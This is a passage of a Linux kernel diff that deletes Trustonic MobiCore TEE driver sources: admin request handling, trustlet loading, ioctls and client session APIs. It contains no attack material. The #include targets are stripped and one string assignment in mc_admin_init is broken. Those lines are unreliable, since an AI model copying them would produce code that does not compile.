*address, uint32_t spid) --{ -- struct device *dev = g_admin_ctx.dev; -- int ret = 0; -- -- /* Lock communication channel */ -- mutex_lock(&g_request.mutex); -- -- /* Send request and wait for header */ -- ret = request_send(MC_DRV_GET_SP_CONTAINER, 0, 0, spid); -- if (ret) -- goto end; -- -- /* Check length against max */ -- if (g_request.response.length >= MAX_SO_CONT_SIZE) { -- request_cancel(); -- dev_err(dev, "%s: response length exceeds maximum\n", __func__); -- ret = EREMOTEIO; -- goto end; -- } -- -- /* Get data */ -- ret = request_receive(address, g_request.response.length); -- if (!ret) -- ret = g_request.response.length; -- --end: -- mutex_unlock(&g_request.mutex); -- return ret; --} -- --static int admin_get_trustlet_container(void *address, -- const struct mc_uuid_t *uuid, -- uint32_t spid) --{ -- struct device *dev = g_admin_ctx.dev; -- int ret = 0; -- -- /* Lock communication channel */ -- mutex_lock(&g_request.mutex); -- -- /* Send request and wait for header */ -- ret = request_send(MC_DRV_GET_TRUSTLET_CONTAINER, uuid, 0, spid); -- if (ret) -- goto end; -- -- /* Check length against max */ -- if (g_request.response.length >= MAX_SO_CONT_SIZE) { -- request_cancel(); -- dev_err(dev, "%s: response length exceeds maximum\n", __func__); -- ret = EREMOTEIO; -- goto end; -- } -- -- /* Get data */ -- ret = request_receive(address, g_request.response.length); -- if (!ret) -- ret = g_request.response.length; -- --end: -- mutex_unlock(&g_request.mutex); -- return ret; --} -- --static struct tbase_object *admin_get_trustlet(const struct mc_uuid_t *uuid, -- uint32_t is_gp, uint32_t *spid) --{ -- struct tbase_object *obj = NULL; -- bool is_sp_tl; -- int ret = 0; -- -- /* Lock communication channel */ -- mutex_lock(&g_request.mutex); -- -- /* Send request and wait for header */ -- ret = request_send(MC_DRV_GET_TRUSTLET, uuid, is_gp, 0); -- if (ret) -- goto end; -- -- /* Allocate memory */ -- is_sp_tl = g_request.response.service_type == SERVICE_TYPE_SP_TRUSTLET; 
-- obj = tbase_object_alloc(is_sp_tl, g_request.response.length); -- if (!obj) { -- request_cancel(); -- ret = -ENOMEM; -- goto end; -- } -- -- /* Get data */ -- ret = request_receive(&obj->data[obj->header_length], obj->length); -- *spid = g_request.response.spid; -- --end: -- mutex_unlock(&g_request.mutex); -- if (ret) -- return ERR_PTR(ret); -- -- return obj; --} -- --static void mc_admin_sendcrashdump(void) --{ -- int ret = 0; -- -- /* Lock communication channel */ -- mutex_lock(&g_request.mutex); -- -- /* Send request and wait for header */ -- ret = request_send(MC_DRV_SIGNAL_CRASH, NULL, false, 0); -- if (ret) -- goto end; -- -- /* Done */ -- request_cancel(); -- --end: -- mutex_unlock(&g_request.mutex); --} -- --static int tbase_object_make(uint32_t spid, struct tbase_object *obj) --{ -- struct mc_blob_len_info *l_info = (struct mc_blob_len_info *)obj->data; -- uint8_t *address = &obj->data[obj->header_length + obj->length]; -- struct mclf_header_v2 *thdr; -- int ret; -- -- /* Get root container */ -- ret = admin_get_root_container(address); -- if (ret < 0) -- goto err; -- -- l_info->root_size = ret; -- address += ret; -- -- /* Get SP container */ -- ret = admin_get_sp_container(address, spid); -- if (ret < 0) -- goto err; -- -- l_info->sp_size = ret; -- address += ret; -- -- /* Get trustlet container */ -- thdr = (struct mclf_header_v2 *)&obj->data[obj->header_length]; -- ret = admin_get_trustlet_container(address, &thdr->uuid, spid); -- if (ret < 0) -- goto err; -- -- l_info->ta_size = ret; -- address += ret; -- -- /* Setup lengths information */ -- l_info->magic = MC_TLBLOBLEN_MAGIC; -- obj->length += sizeof(*l_info); -- obj->length += l_info->root_size + l_info->sp_size + l_info->ta_size; -- ret = 0; -- --err: -- return ret; --} -- --struct tbase_object *tbase_object_read(uint32_t spid, uintptr_t address, -- size_t length) --{ -- struct device *dev = g_admin_ctx.dev; -- char __user *addr = (char __user *)address; -- struct tbase_object *obj; -- uint8_t 
*data; -- struct mclf_header_v2 thdr; -- int ret; -- -- /* Check length */ -- if (length < sizeof(thdr)) { -- dev_err(dev, "%s: buffer shorter than header size\n", __func__); -- return ERR_PTR(-EFAULT); -- } -- -- /* Read header */ -- if (copy_from_user(&thdr, addr, sizeof(thdr))) { -- dev_err(dev, "%s: header: copy_from_user failed\n", __func__); -- return ERR_PTR(-EFAULT); -- } -- -- /* Allocate memory */ -- obj = tbase_object_alloc(thdr.service_type == SERVICE_TYPE_SP_TRUSTLET, -- length); -- if (!obj) -- return ERR_PTR(-ENOMEM); -- -- /* Copy header */ -- data = &obj->data[obj->header_length]; -- memcpy(data, &thdr, sizeof(thdr)); -- /* Copy the rest of the data */ -- data += sizeof(thdr); -- if (copy_from_user(data, &addr[sizeof(thdr)], length - sizeof(thdr))) { -- dev_err(dev, "%s: data: copy_from_user failed\n", __func__); -- vfree(obj); -- return ERR_PTR(-EFAULT); -- } -- -- if (obj->header_length) { -- ret = tbase_object_make(spid, obj); -- if (ret) { -- vfree(obj); -- return ERR_PTR(ret); -- } -- } -- -- return obj; --} -- --struct tbase_object *tbase_object_select(const struct mc_uuid_t *uuid) --{ -- struct tbase_object *obj; -- struct mclf_header_v2 *thdr; -- -- obj = tbase_object_alloc(false, sizeof(*thdr)); -- if (!obj) -- return ERR_PTR(-ENOMEM); -- -- thdr = (struct mclf_header_v2 *)&obj->data[obj->header_length]; -- memcpy(&thdr->uuid, uuid, sizeof(thdr->uuid)); -- return obj; --} -- --struct tbase_object *tbase_object_get(const struct mc_uuid_t *uuid, -- uint32_t is_gp_uuid) --{ -- struct tbase_object *obj; -- uint32_t spid = 0; -- -- /* admin_get_trustlet creates the right object based on service type */ -- obj = admin_get_trustlet(uuid, is_gp_uuid, &spid); -- if (IS_ERR(obj)) -- return obj; -- -- /* SP trustlet: create full secure object with all containers */ -- if (obj->header_length) { -- int ret; -- -- /* Do not return EINVAL in this case as SPID was not found */ -- if (!spid) { -- vfree(obj); -- return ERR_PTR(-ENOENT); -- } -- -- ret = 
tbase_object_make(spid, obj); -- if (ret) { -- vfree(obj); -- return ERR_PTR(ret); -- } -- } -- -- return obj; --} -- --static inline int load_driver(struct tbase_client *client, -- struct mc_admin_load_info *info) --{ -- struct tbase_object *obj; -- struct mclf_header_v2 *thdr; -- struct mc_identity identity = { -- .login_type = TEEC_LOGIN_PUBLIC, -- }; -- uintptr_t dci = 0; -- uint32_t dci_len = 0; -- uint32_t sid; -- int ret; -- -- obj = tbase_object_read(info->spid, info->address, info->length); -- if (IS_ERR(obj)) -- return PTR_ERR(obj); -- -- thdr = (struct mclf_header_v2 *)&obj->data[obj->header_length]; -- if (!(thdr->flags & MC_SERVICE_HEADER_FLAGS_NO_CONTROL_INTERFACE)) { -- /* -- * The driver requires a DCI, although we won't be able to use -- * it to communicate. -- */ -- dci_len = PAGE_SIZE; -- ret = api_malloc_cbuf(client, dci_len, &dci, NULL); -- if (ret) -- goto end; -- } -- -- /* Open session */ -- ret = client_add_session(client, obj, dci, dci_len, &sid, false, -- &identity); -- if (ret) -- api_free_cbuf(client, dci); -- else -- dev_dbg(g_admin_ctx.dev, "driver loaded with sid %x", sid); -- --end: -- vfree(obj); -- return ret; --} -- --static inline int load_token(struct mc_admin_load_info *token) --{ -- struct tbase_mmu *mmu; -- struct mcp_buffer_map map; -- int ret; -- -- mmu = tbase_mmu_create(current, (void *)(uintptr_t)token->address, -- token->length); -- if (IS_ERR(mmu)) -- return PTR_ERR(mmu); -- -- tbase_mmu_buffer(mmu, &map); -- ret = mcp_load_token(token->address, &map); -- tbase_mmu_delete(mmu); -- return ret; --} -- --static inline int load_check(struct mc_admin_load_info *info) --{ -- struct tbase_object *obj; -- struct tbase_mmu *mmu; -- struct mcp_buffer_map map; -- int ret; -- -- obj = tbase_object_read(info->spid, info->address, info->length); -- if (IS_ERR(obj)) -- return PTR_ERR(obj); -- -- mmu = tbase_mmu_create(NULL, obj->data, obj->length); -- if (IS_ERR(mmu)) -- return PTR_ERR(mmu); -- -- tbase_mmu_buffer(mmu, &map); -- ret 
= mcp_load_check(obj, &map); -- tbase_mmu_delete(mmu); -- return ret; --} -- --static ssize_t admin_write(struct file *file, const char __user *user, -- size_t len, loff_t *off) --{ -- int ret; -- -- /* No offset allowed [yet] */ -- if (*off) { -- g_request.response.error_no = EPIPE; -- ret = -ECOMM; -- goto err; -- } -- -- if (server_state_is(REQUEST_RECEIVED)) { -- /* Check client state */ -- if (!client_state_is(REQUEST_SENT)) { -- g_request.response.error_no = EPIPE; -- ret = -EPIPE; -- goto err; -- } -- -- /* Receive response header */ -- if (copy_from_user(&g_request.response, user, -- sizeof(g_request.response))) { -- g_request.response.error_no = EPIPE; -- ret = -ECOMM; -- goto err; -- } -- -- /* Check request ID */ -- if (g_request.request.request_id != -- g_request.response.request_id) { -- g_request.response.error_no = EPIPE; -- ret = -EBADE; -- goto err; -- } -- -- /* Response header is acceptable */ -- ret = sizeof(g_request.response); -- if (g_request.response.length) -- server_state_change(RESPONSE_SENT); -- else -- server_state_change(READY); -- -- goto end; -- } else if (server_state_is(RESPONSE_SENT)) { -- /* Server is waiting */ -- server_state_change(DATA_SENT); -- -- /* Get data */ -- ret = wait_for_completion_interruptible( -- &g_request.client_complete); -- -- /* Server received a signal, let see if it tries again */ -- if (ret) { -- server_state_change(RESPONSE_SENT); -- return ret; -- } -- -- /* Check client state */ -- if (!client_state_is(BUFFERS_READY)) { -- g_request.response.error_no = EPIPE; -- ret = -EPIPE; -- goto err; -- } -- -- /* TODO deal with several writes */ -- if (len != g_request.size) -- len = g_request.size; -- -- ret = copy_from_user(g_request.buffer, user, len); -- if (ret) { -- g_request.response.error_no = EPIPE; -- ret = -ECOMM; -- goto err; -- } -- -- ret = len; -- server_state_change(READY); -- goto end; -- } else { -- ret = -ECOMM; -- goto err; -- } -- --err: -- server_state_change(READY); --end: -- 
complete(&g_request.server_complete); -- return ret; --} -- --static long admin_ioctl(struct file *file, unsigned int cmd, -- unsigned long arg) --{ -- struct tbase_client *client = file->private_data; -- void __user *uarg = (void __user *)arg; -- int ret = -EINVAL; -- -- MCDRV_DBG("%u from %s", _IOC_NR(cmd), current->comm); -- -- if (WARN(!client, "No client data available")) -- return -EFAULT; -- -- switch (cmd) { -- case MC_ADMIN_IO_GET_DRIVER_REQUEST: { -- /* Block until a request is available */ -- ret = wait_for_completion_interruptible( -- &g_request.client_complete); -- if (ret) -- /* Interrupted by signal */ -- break; -- -- /* Check client state */ -- if (!client_state_is(REQUEST_SENT)) { -- g_request.response.error_no = EPIPE; -- complete(&g_request.server_complete); -- ret = -EPIPE; -- break; -- } -- -- /* Send request (the driver request mutex is held) */ -- ret = copy_to_user(uarg, &g_request.request, -- sizeof(g_request.request)); -- if (ret) { -- server_state_change(READY); -- complete(&g_request.server_complete); -- ret = -EPROTO; -- break; -- } -- -- server_state_change(REQUEST_RECEIVED); -- break; -- } -- case MC_ADMIN_IO_GET_INFO: { -- struct mc_admin_driver_info info; -- -- info.drv_version = MC_VERSION(MCDRVMODULEAPI_VERSION_MAJOR, -- MCDRVMODULEAPI_VERSION_MINOR); -- info.initial_cmd_id = g_request.request_id; -- ret = copy_to_user(uarg, &info, sizeof(info)); -- break; -- } -- case MC_ADMIN_IO_LOAD_DRIVER: { -- struct mc_admin_load_info info; -- -- ret = copy_from_user(&info, uarg, sizeof(info)); -- if (ret) -- ret = -EFAULT; -- else -- ret = load_driver(client, &info); -- -- break; -- } -- case MC_ADMIN_IO_LOAD_TOKEN: { -- struct mc_admin_load_info info; -- -- ret = copy_from_user(&info, uarg, sizeof(info)); -- if (ret) -- ret = -EFAULT; -- else -- ret = load_token(&info); -- -- break; -- } -- case MC_ADMIN_IO_LOAD_CHECK: { -- struct mc_admin_load_info info; -- -- ret = copy_from_user(&info, uarg, sizeof(info)); -- if (ret) -- ret = -EFAULT; 
-- else -- ret = load_check(&info); -- -- break; -- } -- default: -- ret = -ENOIOCTLCMD; -- } -- -- return ret; --} -- --/* -- * mc_fd_release() - This function will be called from user space as close(...) -- * The client data are freed and the associated memory pages are unreserved. -- * -- * @inode -- * @file -- * -- * Returns 0 -- */ --static int admin_release(struct inode *inode, struct file *file) --{ -- struct tbase_client *client = file->private_data; -- struct device *dev = g_admin_ctx.dev; -- -- if (!client) -- return -EPROTO; -- -- api_close_device(client); -- file->private_data = NULL; -- -- /* Requests from driver to daemon */ -- mutex_lock(&g_request.states_mutex); -- dev_warn(dev, "%s: daemon disconnected\n", __func__); -- g_request.server_state = NOT_CONNECTED; -- /* A non-zero command indicates that a thread is waiting */ -- if (g_request.client_state != IDLE) { -- g_request.response.error_no = ESHUTDOWN; -- complete(&g_request.server_complete); -- } -- -- mutex_unlock(&g_request.states_mutex); -- atomic_set(&g_admin_ctx.daemon_counter, 0); -- /* -- * ret is quite irrelevant here as most apps don't care about the -- * return value from close() and it's quite difficult to recover -- */ -- return 0; --} -- --static int admin_open(struct inode *inode, struct file *file) --{ -- struct device *dev = g_admin_ctx.dev; -- struct tbase_client *client; -- int err; -- -- /* -- * If the daemon is already set we can't allow anybody else to open -- * the admin interface. 
-- */ -- if (atomic_cmpxchg(&g_admin_ctx.daemon_counter, 0, 1) != 0) { -- MCDRV_ERROR("Daemon is already connected"); -- return -EPROTO; -- } -- -- /* Any value will do */ -- g_request.request_id = 42; -- -- /* Setup the usual variables */ -- MCDRV_DBG("accept %s as tbase daemon", current->comm); -- -- /* -- * daemon is connected so now we can safely suppose -- * the secure world is loaded too -- */ -- if (!IS_ERR_OR_NULL(g_admin_ctx.tee_start_cb)) -- g_admin_ctx.tee_start_cb = ERR_PTR(g_admin_ctx.tee_start_cb()); -- if (IS_ERR(g_admin_ctx.tee_start_cb)) { -- MCDRV_ERROR("Failed initializing the SW"); -- err = PTR_ERR(g_admin_ctx.tee_start_cb); -- goto fail_connection; --} -- -- /* Create client */ -- client = api_open_device(true); -- if (!client) { -- err = -ENOMEM; -- goto fail_connection; -- } -- -- /* Store client in user file */ -- file->private_data = client; -- -- /* Requests from driver to daemon */ -- server_state_change(READY); -- dev_info(dev, "%s: daemon connected\n", __func__); -- -- return 0; -- --fail_connection: -- atomic_set(&g_admin_ctx.daemon_counter, 0); -- return err; --} -- --/* function table structure of this device driver. 
*/ --static const struct file_operations mc_admin_fops = { -- .owner = THIS_MODULE, -- .open = admin_open, -- .release = admin_release, -- .unlocked_ioctl = admin_ioctl, --#ifdef CONFIG_COMPAT -- .compat_ioctl = admin_ioctl, --#endif -- .write = admin_write, --}; -- --int mc_admin_init(struct class *mc_device_class, dev_t *out_dev, -- int (*tee_start_cb)(void)) --{ -- int err = 0; -- -- if (!out_dev || !mc_device_class) -- return -EINVAL; -- -- atomic_set(&g_admin_ctx.daemon_counter, 0); -- -- /* Requests from driver to daemon */ -- mutex_init(&g_request.mutex); -- mutex_init(&g_request.states_mutex); -- init_completion(&g_request.client_complete); -- init_completion(&g_request.server_complete); -- mcp_register_crashhandler(mc_admin_sendcrashdump); -- -- /* Create char device */ -- cdev_init(&g_admin_ctx.mc_admin_cdev, &mc_admin_fops); -- err = alloc_chrdev_region(&g_admin_ctx.mc_dev_admin, 0, MC_DEV_MAX, -- "trustonic_tee"); -- if (err < 0) { -- MCDRV_ERROR("failed to allocate char dev region"); -- goto fail_alloc_chrdev_region; -- } -- -- err = cdev_add(&g_admin_ctx.mc_admin_cdev, g_admin_ctx.mc_dev_admin, 1); -- if (err) { -- MCDRV_ERROR("admin device register failed"); -- goto fail_cdev_add; -- } -- -- g_admin_ctx.mc_admin_cdev.owner = THIS_MODULE; -- g_admin_ctx.dev = device_create(mc_device_class, NULL, -- g_admin_ctx.mc_dev_admin, NULL, -- MC_ADMIN_DEVNODE); -- if (IS_ERR(g_admin_ctx.dev)) { -- err = PTR_ERR(g_admin_ctx.dev); -- goto fail_dev_create; -- } -- -- g_admin_ctx.mc_dev_name.name = "driver = &g_admin_ctx.mc_dev_name; -- *out_dev = g_admin_ctx.mc_dev_admin; -- -- /* Register the call back for starting the secure world */ -- g_admin_ctx.tee_start_cb = tee_start_cb; -- -- MCDRV_DBG("done"); -- return 0; -- --fail_dev_create: -- cdev_del(&g_admin_ctx.mc_admin_cdev); -- --fail_cdev_add: -- unregister_chrdev_region(g_admin_ctx.mc_dev_admin, MC_DEV_MAX); -- --fail_alloc_chrdev_region: -- MCDRV_ERROR("fail with %d", err); -- return err; --} -- --void 
mc_admin_exit(struct class *mc_device_class) --{ -- device_destroy(mc_device_class, g_admin_ctx.mc_dev_admin); -- cdev_del(&g_admin_ctx.mc_admin_cdev); -- unregister_chrdev_region(g_admin_ctx.mc_dev_admin, MC_DEV_MAX); -- /* Requests from driver to daemon */ -- mutex_destroy(&g_request.states_mutex); -- MCDRV_DBG("done"); --} -diff --git a/drivers/gud/MobiCoreDriver/admin.h b/drivers/gud/MobiCoreDriver/admin.h -deleted file mode 100644 -index 5a78d943752da..0000000000000 ---- a/drivers/gud/MobiCoreDriver/admin.h -+++ /dev/null -@@ -1,32 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. -- */ -- --#ifndef ADMIN_FD_H_ --#define ADMIN_FD_H_ -- --struct mc_uuid_t; --struct tbase_object; -- --int mc_admin_init(struct class *mc_device_class, dev_t *out_dev, -- int (*tee_start_cb)(void)); --void mc_admin_exit(struct class *mc_device_class); -- --struct tbase_object *tbase_object_select(const struct mc_uuid_t *uuid); --struct tbase_object *tbase_object_get(const struct mc_uuid_t *uuid, -- uint32_t is_gp_uuid); --struct tbase_object *tbase_object_read(uint32_t spid, uintptr_t address, -- size_t length); --void tbase_object_free(struct tbase_object *out_robj); -- --#endif /* ADMIN_FD_H_ */ -diff --git a/drivers/gud/MobiCoreDriver/api.c b/drivers/gud/MobiCoreDriver/api.c -deleted file mode 100644 -index 0d2abaf617aea..0000000000000 ---- a/drivers/gud/MobiCoreDriver/api.c -+++ /dev/null -@@ -1,419 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. 
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include
--#include
--#include
--#include
--#include
--
--#include /* MC_MAP_MAX */
--#include "main.h"
--#include "debug.h"
--#include "mcp.h"
--#include "admin.h"
--#include "session.h"
--#include "client.h"
--#include "api.h"
--
--static struct api_ctx {
-- struct mutex clients_lock; /* Clients list + temp notifs */
-- struct list_head clients; /* List of user-space clients */
--} api_ctx;
--
--/*
-- * Initialize a new tbase client object
-- * @return client pointer or NULL if no allocation was possible.
-- */
--struct tbase_client *api_open_device(bool is_from_kernel)
--{
-- struct tbase_client *client;
--
-- /* Allocate and init client object */
-- client = client_create(is_from_kernel);
-- if (!client) {
-- MCDRV_ERROR("Could not create client");
-- return NULL;
-- }
--
-- /* Add client to list of clients */
-- mutex_lock(&api_ctx.clients_lock);
-- list_add_tail(&client->list, &api_ctx.clients);
-- mutex_unlock(&api_ctx.clients_lock);
--
-- MCDRV_DBG("created client %p", client);
-- return client;
--}
--
--/*
-- * Try and mark client as "closing"
-- * @return tbase driver error code
-- */
--int api_freeze_device(struct tbase_client *client)
--{
-- int err = 0;
--
-- if (!client_set_closing(client))
-- err = -ENOTEMPTY;
--
-- MCDRV_DBG("client %p, exit with %d\n", client, err);
-- return err;
--}
--
--/*
-- * Release a client and the session+cbuf objects it contains.
-- * @param client_t client
-- * @return tbase driver error code
-- */
--void api_close_device(struct tbase_client *client)
--{
-- /* Remove client from list of active clients */
-- mutex_lock(&api_ctx.clients_lock);
-- list_del(&client->list);
-- mutex_unlock(&api_ctx.clients_lock);
-- /* Close all remaining sessions */
-- client_close_sessions(client);
-- client_put(client);
-- MCDRV_DBG("client %p closed\n", client);
--}
--
--/*
-- * Open TA for given client. TA binary is provided by the daemon.
-- * @param
-- * @return tbase driver error code
-- */
--int api_open_session(struct tbase_client *client,
-- uint32_t *p_session_id,
-- const struct mc_uuid_t *uuid,
-- uintptr_t tci,
-- size_t tci_len,
-- bool is_gp_uuid,
-- struct mc_identity *identity)
--{
-- int err = 0;
-- uint32_t sid = 0;
-- struct tbase_object *obj;
--
-- /* Check parameters */
-- if (!p_session_id)
-- return -EINVAL;
--
-- if (!uuid)
-- return -EINVAL;
--
-- /* Get secure object */
-- obj = tbase_object_get(uuid, is_gp_uuid);
-- if (IS_ERR(obj)) {
-- /* Try to select secure object inside the SWd if not found */
-- if ((PTR_ERR(obj) == -ENOENT) && g_ctx.f_ta_auth)
-- obj = tbase_object_select(uuid);
--
-- if (IS_ERR(obj)) {
-- err = PTR_ERR(obj);
-- goto end;
-- }
-- }
--
-- /* Open session */
-- err = client_add_session(client, obj, tci, tci_len, &sid, is_gp_uuid,
-- identity);
-- /* Fill in return parameter */
-- if (!err)
-- *p_session_id = sid;
--
-- /* Delete secure object */
-- tbase_object_free(obj);
--
--end:
--
-- MCDRV_DBG("session %x, exit with %d\n", sid, err);
-- return err;
--}
--
--/*
-- * Open TA for given client. TA binary is provided by the client.
-- * @param
-- * @return tbase driver error code
-- */
--int api_open_trustlet(struct tbase_client *client,
-- uint32_t *p_session_id,
-- uint32_t spid,
-- uintptr_t trustlet,
-- size_t trustlet_len,
-- uintptr_t tci,
-- size_t tci_len)
--{
-- struct tbase_object *obj;
-- struct mc_identity identity = {
-- .login_type = TEEC_LOGIN_PUBLIC,
-- };
-- uint32_t sid = 0;
-- int err = 0;
--
-- /* Check parameters */
-- if (!p_session_id)
-- return -EINVAL;
--
-- /* Create secure object from user-space trustlet binary */
-- obj = tbase_object_read(spid, trustlet, trustlet_len);
-- if (IS_ERR(obj)) {
-- err = PTR_ERR(obj);
-- goto end;
-- }
--
-- /* Open session */
-- err = client_add_session(client, obj, tci, tci_len, &sid, false,
-- &identity);
-- /* Fill in return parameter */
-- if (!err)
-- *p_session_id = sid;
--
-- /* Delete secure object */
-- tbase_object_free(obj);
--
--end:
-- MCDRV_DBG("session %x, exit with %d\n", sid, err);
-- return err;
--}
--
--/*
-- * Close a TA
-- * @param
-- * @return tbase driver error code
-- */
--int api_close_session(struct tbase_client *client, uint32_t session_id)
--{
-- int ret = client_remove_session(client, session_id);
--
-- MCDRV_DBG("session %x, exit with %d\n", session_id, ret);
-- return ret;
--}
--
--/*
-- * Send a notification to TA
-- * @return tbase driver error code
-- */
--int api_notify(struct tbase_client *client, uint32_t session_id)
--{
-- int err = 0;
-- struct tbase_session *session = NULL;
--
-- /* Acquire session */
-- session = client_ref_session(client, session_id);
--
-- /* Send command to SWd */
-- if (!session) {
-- err = -ENXIO;
-- } else {
-- err = session_notify_swd(session);
--
-- /* Release session */
-- client_unref_session(session);
-- }
--
-- MCDRV_DBG("session %x, exit with %d\n", session_id, err);
-- return err;
--}
--
--/*
-- * Wait for a notification from TA
-- * @return tbase driver error code
-- */
--int api_wait_notification(struct tbase_client *client,
-- uint32_t session_id,
-- int32_t
timeout)
--{
-- int err = 0;
-- struct tbase_session *session = NULL;
--
-- /* Acquire session */
-- session = client_ref_session(client, session_id);
--
-- /* Wait for notification */
-- if (!session) {
-- err = -ENXIO;
-- } else {
-- err = session_waitnotif(session, timeout);
--
-- /* Release session */
-- client_unref_session(session);
-- }
--
-- MCDRV_DBG("session %x, exit with %d\n", session_id, err);
-- return err;
--}
--
--/*
-- * Allocate a contiguous buffer (cbuf) for given client
-- *
-- * @param client client
-- * @param len size of the cbuf
-- * @param **p_addr pointer to the cbuf kva
-- * @return tbase driver error code
-- */
--int api_malloc_cbuf(struct tbase_client *client, uint32_t len,
-- uintptr_t *addr, struct vm_area_struct *vmarea)
--{
-- int err = tbase_cbuf_alloc(client, len, addr, vmarea);
--
-- MCDRV_DBG("exit with %d\n", err);
-- return err;
--}
--
--/*
-- * Free a contiguous buffer from given client
-- * @param client
-- * @param addr kernel virtual address of the buffer
-- *
-- * @return tbase driver error code
-- */
--int api_free_cbuf(struct tbase_client *client, uintptr_t addr)
--{
-- int err = tbase_cbuf_free(client, addr);
--
-- MCDRV_DBG("@ 0x%lx, exit with %d\n", addr, err);
-- return err;
--}
--
--/* Share a buffer with given TA in SWd */
--int api_map_wsms(struct tbase_client *client, uint32_t session_id,
-- struct mc_ioctl_buffer *bufs)
--{
-- struct tbase_session *session = NULL;
-- int err = 0;
--
-- if (!client)
-- return -EINVAL;
--
-- if (!bufs)
-- return -EINVAL;
--
-- /* Acquire session */
-- session = client_ref_session(client, session_id);
--
-- if (session) {
-- /* Add buffer to the session */
-- err = session_wsms_add(session, bufs);
--
-- /* Release session */
-- client_unref_session(session);
-- } else {
-- err = -ENXIO;
-- }
--
-- MCDRV_DBG("exit with %d\n", err);
-- return err;
--}
--
--/* Stop sharing a buffer with SWd */
--int api_unmap_wsms(struct tbase_client *client, uint32_t session_id,
-- const struct
mc_ioctl_buffer *bufs)
--{
-- struct tbase_session *session = NULL;
-- int err = 0;
--
-- if (!client)
-- return -EINVAL;
--
-- if (!bufs)
-- return -EINVAL;
--
-- /* Acquire session */
-- session = client_ref_session(client, session_id);
--
-- if (!session) {
-- err = -ENXIO;
-- } else {
-- /* Remove buffer from session */
-- err = session_wsms_remove(session, bufs);
-- /* Release session */
-- client_unref_session(session);
-- }
--
-- MCDRV_DBG("exit with %d\n", err);
-- return err;
--}
--
--/*
-- * Read session exit/termination code
-- */
--int api_get_session_exitcode(struct tbase_client *client, uint32_t session_id,
-- int32_t *exit_code)
--{
-- int err = 0;
-- struct tbase_session *session;
--
-- /* Acquire session */
-- session = client_ref_session(client, session_id);
--
-- if (!session) {
-- err = -ENXIO;
-- } else {
-- /* Retrieve error */
-- *exit_code = session_exitcode(session);
--
-- /* Release session */
-- client_unref_session(session);
--
-- err = 0;
-- }
--
-- MCDRV_DBG("session %x, exit with %d\n", session_id, err);
-- return err;
--}
--
--void api_init(void)
--{
-- INIT_LIST_HEAD(&api_ctx.clients);
-- mutex_init(&api_ctx.clients_lock);
--
-- INIT_LIST_HEAD(&g_ctx.closing_sess);
-- mutex_init(&g_ctx.closing_lock);
--}
--
--int api_info(struct kasnprintf_buf *buf)
--{
-- struct tbase_client *client;
-- struct tbase_session *session;
-- ssize_t ret = 0;
--
-- mutex_lock(&api_ctx.clients_lock);
-- if (list_empty(&api_ctx.clients))
-- goto done;
--
-- list_for_each_entry(client, &api_ctx.clients, list) {
-- ret = client_info(client, buf);
-- if (ret < 0)
-- break;
-- }
--
--done:
-- mutex_unlock(&api_ctx.clients_lock);
--
-- if (ret >= 0) {
-- mutex_lock(&g_ctx.closing_lock);
-- if (!list_empty(&g_ctx.closing_sess))
-- ret = kasnprintf(buf, "closing sessions:\n");
--
-- list_for_each_entry(session, &g_ctx.closing_sess, list) {
-- ret = session_info(session, buf);
-- if (ret < 0)
-- break;
-- }
--
-- mutex_unlock(&g_ctx.closing_lock);
-- }
--
--
return ret;
--}
-diff --git a/drivers/gud/MobiCoreDriver/api.h b/drivers/gud/MobiCoreDriver/api.h
-deleted file mode 100644
-index 740ec7fb2d5b9..0000000000000
---- a/drivers/gud/MobiCoreDriver/api.h
-+++ /dev/null
-@@ -1,46 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _API_H_
--#define _API_H_
--
--struct tbase_client;
--
--struct tbase_client *api_open_device(bool is_from_kernel);
--int api_freeze_device(struct tbase_client *client);
--void api_close_device(struct tbase_client *client);
--int api_open_session(struct tbase_client *client, uint32_t *session_id,
-- const struct mc_uuid_t *uuid,
-- uintptr_t tci, size_t tci_len, bool is_gp_uuid,
-- struct mc_identity *identity);
--int api_open_trustlet(struct tbase_client *client, uint32_t *session_id,
-- uint32_t spid, uintptr_t trustlet, size_t trustlet_len,
-- uintptr_t tci, size_t tci_len);
--int api_close_session(struct tbase_client *client, uint32_t session_id);
--int api_notify(struct tbase_client *client, uint32_t session_id);
--int api_wait_notification(struct tbase_client *client, uint32_t session_id,
-- int32_t timeout);
--int api_malloc_cbuf(struct tbase_client *client, uint32_t len, uintptr_t *addr,
-- struct vm_area_struct *vmarea);
--int api_free_cbuf(struct tbase_client *client, uintptr_t addr);
--int api_map_wsms(struct tbase_client *client, uint32_t session_id,
-- struct mc_ioctl_buffer *bufs);
--int api_unmap_wsms(struct tbase_client *client, uint32_t session_id,
-- const struct
mc_ioctl_buffer *bufs);
--int api_get_session_exitcode(struct tbase_client *client, uint32_t session_id,
-- int32_t *exit_code);
--void api_init(void);
--int api_info(struct kasnprintf_buf *buf);
--
--#endif /* _API_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/arm.h b/drivers/gud/MobiCoreDriver/arm.h
-deleted file mode 100644
-index 58d91f11f789c..0000000000000
---- a/drivers/gud/MobiCoreDriver/arm.h
-+++ /dev/null
-@@ -1,88 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
